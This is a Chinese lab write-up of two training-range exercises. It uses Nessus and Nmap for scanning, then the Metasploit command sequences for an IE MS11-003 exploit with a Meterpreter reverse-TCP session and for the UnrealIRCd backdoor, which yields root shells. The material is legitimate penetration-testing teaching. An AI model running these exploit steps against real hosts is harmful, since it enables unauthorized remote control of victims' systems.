渗透测试-Metasploit实战

攻击工具

Nessus

Nessus是一个功能强大而又易于使用的网络和主机漏洞评估工具,分为免费的家庭版和付费的企业版。Nessus 6.0 以后采取Browser/Server模式,Server端负责进行安全检查、具体的扫描任务,客户端用来配置管理服务器端。

服务端采用plug-in的体系,允许用户加入执行特定功能的插件,这插件可以进行更快速和更复杂的安全检查。Nessus自带大量安全检查插件能够满足一般用户的安全评估任务需要,如果有特殊需要也可以将自己开发的安全检查插件集成到Nessus中。和其他安全扫描工具相比,Nessus主要优势在于免费、扩展性强,容易使用以及能够对目标系统进行全面的漏洞扫描。
在这里插入图片描述
默认状态下, Nessus扫描完成以后,会生成一份详细的报告,报告里会将扫描结果按照危险系数高低分成高危漏洞、中危漏洞、低危漏洞三类,我们一般重点关注高危漏洞,中危漏洞利用条件会比较苛刻,低危漏洞基本没有利用的可能。查看高危漏洞详情,根据漏洞简介信息使用Google搜索是否存在已知的Exp和攻击方法可以提高安全测试效率。

Metasploit

Metasploit是目前世界上领先的渗透测试工具,也是信息安全与渗透测试领域最大的开源项目之一,它彻底改变了我们执行安全测试的方式。Metasploit适用于所有流行的操作系统,Kali Linux则直接预装了Metasploit框架和运行在框架上的其他第三方工具。

Metasploit Framework(简称MSF)是一个免费的、可下载的渗透测试框架,它本身附带数百个已知软件漏洞的专业级漏洞攻击工具,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。

当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。

相关术语 解释
Exploit 攻击代码或程序;每个漏洞都有对应的漏洞利用程序;Metasploit有超过 1700 个漏洞利用程序
Payload 攻击载荷;用于建立攻击者和受害者机器直接的连接;Metasploit有超过 500个有效攻击载荷
Module 模块化结构;模块化的架构的好处是可以很容易的将自己写的利用程序和工具集成到框架中

Win7主机

RCE漏洞

漏洞名称:Microsoft Internet Explorer 内存远程代码执行漏洞
CVE编号:CVE-2010-3971
漏洞编号:MS11-003
发布日期:2011-02-08
微软公布:https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2011/ms11-003
影响系统
Microsoft Internet Explorer 8.x
Microsoft Internet Explorer 7.x
Microsoft Internet Explorer 6.x
漏洞描述
Internet Explorer是Windows操作系统中默认捆绑的WEB浏览器。IE在处理畸形的CSS文件引用及对象事件时存在内存破坏漏洞,远程攻击者可能利用此漏洞通过诱使用户访问恶意网页在用户系统中执行任意指令或造成拒绝服务。

危害】攻击者成功利用此漏洞可获取与当前用户相同的权限。即如果用户以管理员身份登录,攻击者可利用此漏洞完全控制受影响系统。攻击者进一步可安装恶意程序;查看、更改或上传数据;或以完全用户权限创建新账号。

实验环境

下文将介绍合天网安实验室的一个靶场(Metasploit攻击win7实例 )攻击过程,靶场链接:http://www.hetianlab.com/expc.do?ce=3971a5c7-6a41-441e-b5a0-6193b9c5c5ec
在这里插入图片描述

Nessus漏扫

为了对目标Win7主机(IP:10.1.1.129)进行攻击,首先可使用Nessus漏扫工具收集下主机是否存在可利用的漏洞信息。

1、在CMD中查看并确认Win7主机IP和用户,并关闭Win7系统的防火墙:
在这里插入图片描述
2、查看并确认攻击者Kali主机的登陆用户及网络配置信息:
在这里插入图片描述
3、在Nessus官网下载(短网址:http://sina.lt/9Pp)适合Kali linux的安装程序。下载之后,拷贝到Kali linux主机上(实验机已为我们下载好),运行下列命令进行安装:
在这里插入图片描述
在这里插入图片描述
4、输入以下命令,启动Nessus服务,如下图所示:
在这里插入图片描述
5、在浏览器中输入https://127.0.0.1:8834/访问Nessus平台:
在这里插入图片描述6、登录的账号密码在Kali主机桌面文件夹Nessus下(账号YoYo/密码heetian),登录后新建一个漏洞扫描任务,如下:
在这里插入图片描述
7、配置扫描信息,主要设置扫描名称、描述和扫描目标三个信息即可,其他配置选择默认,配置完成点击Save。选择对整个10.1.1.0/24网段进行扫描,如下图所示:
在这里插入图片描述8、扫描结束后,Nessus会很直观的显示出目标网段的安全情况,下图显示了整个网段4台主机的的安全信息:
在这里插入图片描述

9、重点关注10.1.1.129主机(即Win7靶机),Nessus扫描出该主机存在1个致命漏洞、1个高危漏洞,如下图所示:
在这里插入图片描述
10、查看致命漏洞,Nessus给出了该漏洞的介绍、风险信息、解决方案等详细信息,Google搜索是否存在已知的漏洞利用Exp。
在这里插入图片描述

Metasploit攻击

上面扫描得到Win7主机系统存在MS11_030解析漏洞,但是该漏洞利用条件较为苛刻,因此下面选择MS11_003 IE CSS Import漏洞来演示如何通过诱骗攻击者点击我们精心构造的含有攻击代码的网页来实现系统入侵。

1、在Kali主机控制台中执行命令“msfconsole”,启动metasploit,如下图所示:
在这里插入图片描述
2、运行命令:“use exploit/windows/browser/ms11_003_ie_css_import”选择漏洞利用EXP,如下图所示:
在这里插入图片描述
3、运行命令:show options,查看配置选项,如下图所示:
在这里插入图片描述

4、运行命令:set URIPATH baidu.com,设置生成的恶意网页的URI为baidu.com,如下图所示:
在这里插入图片描述
5、为防止服务器端口冲突,设置服务器端口为8060,避开常用端口8080,运行命令:set SRVPORT 8060,如下图所示:
在这里插入图片描述
6、 运行命令:set PAYLOAD windows/meterpreter/reverse_tcp设置攻击负载,如下图所示:
在这里插入图片描述7、运行命令:show options,查看配置选项,如下图所示:
在这里插入图片描述
8、运行命令: set LHOST 10.1.1.128,设置LHOST以绑定本地IP,如下图所示:
在这里插入图片描述
9、为避免端口冲突,设置LPORT, 运行命令:set LPORT 8866,如下图所示:
在这里插入图片描述
10、运行命令:exploit,开始进行攻击,已生成恶意网页,只等受害者访问我们构造的恶意网页:
在这里插入图片描述
11、在 Win7靶机打开IE浏览器,访问地址http://10.1.1.128:8060/baidu.com,模拟受害者误点击网页,如下图所示:
在这里插入图片描述
12、此时攻击机Metasploit显示如下图所示信息,表明攻击成功:
在这里插入图片描述13、 验证攻击是否成功。使用命令sessions列出当前成功建立的回话,接着使用命令sessions –i 2 进入2号会话,然后使用命令getuid 查看攻击者的身份:
在这里插入图片描述
14、可见当前已经可以以Win7靶机管理员Administrator的身份执行任意命令,继续执行以下命令验证下:
在这里插入图片描述在这里插入图片描述
至此,攻击结束。我们成功利用MSF对MS11_003漏洞进行利用,实现对目标靶机的远程任意命令执行攻击。

Linux主机

后门漏洞

漏洞名称:UnrealIRCd 后门未授权访问漏洞
CVE编号:CVE-2010-2075
发布日期:2010-06-18
影响系统
Unrealircd:Unrealircd:3.2.8.1:::
漏洞描述
2009年11月到2010年6月间分布于某些镜面站点的UnrealIRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的修改(特洛伊木马),远程攻击者可执行任意命令。

实验环境

下文将介绍合天网安实验室的一个靶场(
Metasploit攻击linux实例 )攻击过程,靶场链接:http://www.hetianlab.com/expc.do?ce=1a3ed230-d673-4f65-8955-42fb0c84bfec
在这里插入图片描述

Nmap扫描

1、查看并确认漏洞主机的登录用户及网络配置信息,如下:
在这里插入图片描述
2、查看并确认攻击者主机登陆用户及网络配置信息,如下:
在这里插入图片描述
3、利用Nmap命令: nmap -sT -v 10.1.1.136 扫描漏洞主机开放的端口信息,扫描结果如下:
在这里插入图片描述
4、漏洞主机开启了大量的端口,其中6667号端口开放IRC服务,可以利用UnrealIRCD IRC软件的漏洞来攻击漏洞主机:
在这里插入图片描述

Metasploit攻击

1、执行“msfconsole”命令启动MSF:
在这里插入图片描述
2、 执行“search unrealircd”命令搜索关于UnrealIRCD漏洞的利用信息:
在这里插入图片描述
3、 执行“use exploit/unix/irc/unreal_ircd_3281_backdoor”命令开始运行EXP:
在这里插入图片描述
4、执行’show options’ 命令查看该exploit的参数设置信息,发现执行该EXP前可以配置漏洞主机的IP和端口:
在这里插入图片描述
5、执行“set RHOST 10.1.1.136 ”命令设置漏洞主机IP(该EXP默认端口为6667,与Metasploitable2漏洞主机开启IRC服务的端口一致,所以不用修改端口):
在这里插入图片描述
6、执行“exploit”命令,开始进行攻击,如下成功建立Shell会话:
在这里插入图片描述
7、验证shell权限,运行linux系统命令“whoami”,回显“root”说明当前shell的权限是root权限,可进行任意操作而不受权限控制:
在这里插入图片描述至此,攻击结束。我们成功借助MSF,利用UnrealIRCd后门漏洞攻击漏洞主机。

发布了122 篇原创文章 · 获赞 90 · 访问量 9万+

猜你喜欢

转载自blog.csdn.net/weixin_39190897/article/details/104285302
今日推荐